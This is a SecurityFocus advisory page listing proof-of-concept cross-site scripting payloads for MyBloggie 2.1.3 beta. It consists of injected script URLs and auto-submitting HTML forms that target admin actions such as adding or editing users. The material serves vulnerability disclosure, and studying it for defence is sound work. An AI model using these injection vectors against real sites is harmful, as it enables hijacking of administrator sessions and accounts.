Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Beta Programs

MyBloggie Multiple Cross-Site Scripting Vulnerabilities

This issue can be exploited through use of a web client.

The following examples are available:

http://www.example.com/mybloggie213beta/index.php?mode=delcom&confirmredirect="><script>alert('xss_string')</script>

<form action="http://www.example.com/mybloggie213beta/index.php?mode=delcom&comment_id=1&redirect=adm&confirm=yes" method="post">
<input type="text" name="post_id" value='">xss_string' />
<input type="submit"/>
</form>
<script type="text/javascript">
document.forms[0].submit();
</script>

<form action="http://www.example.com/mybloggie213beta/index.php?mode=delcom&comment_id=1" method="post">
<input type="text" name="post_id" value='">xss_string' />
<input type="submit"/>
</form>
<script type="text/javascript">
document.forms[0].submit();
</script>

http://www.example.com/mybloggie213beta/admin.php?mode=upload&del=xss_string

http://www.example.com/mybloggie213beta/admin.php?mode=upload&message=xss_string

<form action="http://www.example.com/mybloggie213beta/admin.php?mode=addcat&errormsg=<script>alert('xss_string')</script>" method="post">
<input type="text" name="cat_desc" value='' />
<input type="submit"/>
</form>
<script type="text/javascript">
document.forms[0].submit();
</script>

<form action="http://www.example.com/mybloggie213beta/admin.php?mode=edituser&id=1&pass=yes&errormsg=<script>alert('xss_string')</script>" method="post">
<input type="text" name="password" value='' />
<input type="text" name="repassword" value='' />
<input type="text" name="user" value='' />
<input type="submit"/>
</form>
<script type="text/javascript">
document.forms[0].submit();
</script>

<form action="http://www.example.com/mybloggie213beta/admin.php?mode=adduser&errormsg=<script>alert('xss_string')</script>" method="post">
<input type="text" name="password" value='' />
<input type="text" name="repassword" value='' />
<input type="text" name="user" value='x' />
<input type="submit"/>
</form>
<script type="text/javascript">
document.forms[0].submit();
</script>

<form action="http://www.example.com/mybloggie213beta/admin.php?mode=editcat&errormsg=<script>alert('xss_string')</script>" method="post">
<input type="text" name="cat_desc" value='' />
<input type="submit"/>
</form>
<script type="text/javascript">
document.forms[0].submit();
</script>

<form action="http://www.example.com/mybloggie213beta/admin.php?mode=add" method="post">
<input type="text" name="submit" value='xyz' />
<input type="text" name="message" value='xyz' />
<input type="text" name="trackback_url" value='<script>alert("xss_string")</script>' />
<input type="submit">
</form>
<script type="text/javascript">
document.forms[0].submit();
</script>

http://www.example.com/mybloggie213beta/admin.php?mode=deluser&id="><script>alert('xss_string')</script>
http://www.example.com/mybloggie213beta/admin.php?mode=delcat&cat_id="><script>alert('xss_string')</script>

http://www.example.com/mybloggie213beta/admin.php?mode=del&post_id="><script>alert('xss_string')</script>







 

Privacy Statement
Copyright 2009, SecurityFocus